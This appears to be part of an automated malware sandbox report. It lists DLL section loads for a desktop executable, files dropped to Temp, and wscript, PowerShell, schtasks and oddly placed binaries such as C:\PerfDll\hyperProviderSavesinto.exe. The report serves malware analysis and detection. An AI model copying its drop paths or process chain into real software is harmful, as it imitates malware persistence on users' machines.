Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: version.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ktmw32.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: textshaping.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: textinputframework.dll
